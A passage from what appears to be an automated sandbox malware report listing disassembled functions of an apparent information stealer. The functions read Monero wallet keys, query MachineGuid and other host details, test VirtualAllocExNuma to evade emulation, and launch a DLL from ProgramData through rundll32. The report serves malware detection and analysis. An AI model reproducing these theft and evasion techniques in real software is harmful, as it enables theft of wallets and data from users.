                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                        • API String ID: 3529164666-3586502688
                                                                                                                                                        • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                        • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                                                        • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                        • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                                                        Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00411607
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                        • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CharOpenQueryValue_memset
                                                                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                        • API String ID: 2355623204-1211650757
                                                                                                                                                        • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                        • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                                                        • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                        • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                                                        Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                        Strings
                                                                                                                                                        • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                        • wallet_path, xrefs: 00401A9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                        • API String ID: 3676486918-4244082812
                                                                                                                                                        • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                        • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                                                        • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                        • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                                                        Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                        • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                        • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 181426013-0
                                                                                                                                                        • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                        • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                                                        • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                        • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                                                        Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                        • _memset.LIBCMT ref: 004010D0
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1859398019-0
                                                                                                                                                        • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                        • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                                                        • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                        • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                                                        Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                                                                        • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                        • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                                                        • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                        • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                                                        Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                        • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                        • String ID: Unknown
                                                                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                                                                        • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                        • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                                                        • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                        • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                                                        Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                        • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                        • String ID: %d MB
                                                                                                                                                        • API String ID: 3644086013-2651807785
                                                                                                                                                        • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                        • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                                                        • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                        • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                                                        Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: Windows 11
                                                                                                                                                        • API String ID: 3676486918-2517555085
                                                                                                                                                        • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                        • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                        • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                        • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                        Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
